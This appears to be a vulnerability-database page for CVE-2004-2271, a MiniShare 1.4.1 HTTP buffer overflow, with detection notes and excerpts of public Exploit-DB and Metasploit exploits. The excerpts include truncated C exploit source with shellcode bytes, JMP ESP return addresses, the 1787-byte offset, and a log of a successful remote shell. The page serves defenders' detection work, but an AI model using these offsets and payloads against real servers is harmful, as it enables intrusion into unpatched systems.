CVE-2004-2271
published 2004-12-31CVE-2004-2271: Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
PriorityP260high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
71.91%
99.3th percentile
Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to execute arbitrary code via a long HTTP GET request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| minishare | minimal_http_server | <= 1.4.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xB8\x9E\xE3\x77
bytes↗
\xb8\x9e\xe3\x77
bytes↗
\x33\x55\xdc\x77
bytes↗
\xf8\x29\xf3\x77
bytes↗
0x7754a3ab
bytes↗
0x7517f163
bytes↗
0x71ab1d54
bytes↗
0x71ab9372
bytes↗
0x71c03c4d
bytes↗
0x77f329f8
bytes↗
0x77d5af0a
bytes↗
0x77d4e26e
bytes↗
\xEB\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF
bytes↗
\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e
- →Exploit sends an oversized HTTP GET (or HEAD/POST) request of ~2220 bytes to port 80; the URI portion is padded with 1787 bytes of 'A' (0x41) followed by a 4-byte JMP ESP address — detect abnormally large HTTP request lines to MiniShare. ↗
- →HEAD and POST methods are equally exploitable with the same 1787-byte padding offset; monitor for oversized HEAD/POST requests as well as GET. ↗
- →Payload bad characters for this exploit are null byte, colon, ampersand, question mark, percent, hash, space, LF, CR, forward-slash, plus, vertical-tab, backslash, and at-sign — shellcode in the wild will avoid these bytes. ↗
- →The exploit opens a bind shell on port 101 (exploit-db/616) or a reverse shell on port 4444 (exploit-db/636) after successful exploitation; monitor for unexpected outbound/inbound connections on these ports from the MiniShare process. ↗
- →The exploit uses a plain stack buffer overflow requiring a 'jmp esp' or 'push esp; ret' gadget at offset 1787 in the HTTP request URI; a Snort/IDS rule should flag HTTP requests whose URI length exceeds 1800 bytes directed at MiniShare (default port 80). ↗
- →Only 210 bytes are available for shellcode after the overflow; and known bad chars are 0x00 and 0x0d — encoded/XOR'd shellcode (e.g., XOR key 0x88) should be expected in traffic. ↗
- →Versions 1.3.4 and below are NOT vulnerable; focus detection on MiniShare versions 1.3.5 through 1.4.1. ↗
- ·JMP ESP addresses are OS/SP-specific; the Metasploit module lists nine distinct return addresses across Windows 2000, XP, 2003, and NT targets — a single static RET address will only work against one platform. ↗
- ·The exploit may require timing adjustments (Sleep() calls) to succeed; a wrong offset or timing will crash MiniShare without code execution. ↗
- ·The Metasploit payload space is only 1024 bytes with a required minimum of 64 NOPs and a stack adjustment of -3500; larger payloads will not fit. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
exploitdb·2018-12-18·CVSS 7.5
CVE-2018-19862 [HIGH] MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow
---
Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
methods are also vulnerable. The difference is minimal, both are exploited
in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
EAX 00000000
ECX 77C3EF3B msvcrt.77C3EF3B
EDX 00F14E38
EBX 43346843
ESP 01563908 ASCII
"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
HTTP/1.1
"
EBP 0156BB90
ESI 00000001
EDI 01565B68
EIP 68433568
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 1 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
MiniShare 1.4.1 - Remote Buffer Overflow (Metasploit)
---
##
# $Id: minishare_get_overflow.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Minishare 1.4.1 Buffer Overflow',
'Description' => %q{
This is a simple buffer overflow for the minishare web
server. This flaw affects all versions prior to 1.4.2. This
is a plain stack buffer overflow that requires a "jmp esp" to reach
the payload, making this difficult to target many platforms
at once. This module has been successfully tested against
1.4.1. Version
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (2)
exploitdb·2004-11-16
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (2)
MiniShare 1.4.1 - Remote Buffer Overflow (2)
---
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\
Exploit-DB
MiniShare 1.4.1 - Remote Buffer Overflow (1)
exploitdb·2004-11-07
CVE-2004-2271 MiniShare 1.4.1 - Remote Buffer Overflow (1)
MiniShare 1.4.1 - Remote Buffer Overflow (1)
---
/*
MiniShare
----
EXTRA
----
Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x
Metasploit
Minishare 1.4.1 Buffer Overflow
metasploit
Minishare 1.4.1 Buffer Overflow
Minishare 1.4.1 Buffer Overflow
This is a simple buffer overflow for the minishare web server. This flaw affects all versions prior to 1.4.2. This is a plain stack buffer overflow that requires a "jmp esp" to reach the payload, making this difficult to target many platforms at once. This module has been successfully tested against 1.4.1. Version 1.3.4 and below do not seem to be vulnerable.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.htmlhttp://secunia.com/advisories/13114http://securitytracker.com/id?1012106http://sourceforge.net/project/shownotes.php?release_id=241158http://www.osvdb.org/11530http://www.securiteam.com/exploits/6X00B1PBPC.htmlhttp://www.securityfocus.com/bid/11620https://exchange.xforce.ibmcloud.com/vulnerabilities/17978http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.htmlhttp://secunia.com/advisories/13114http://securitytracker.com/id?1012106http://sourceforge.net/project/shownotes.php?release_id=241158http://www.osvdb.org/11530http://www.securiteam.com/exploits/6X00B1PBPC.htmlhttp://www.securityfocus.com/bid/11620https://exchange.xforce.ibmcloud.com/vulnerabilities/17978
2004-12-31
Published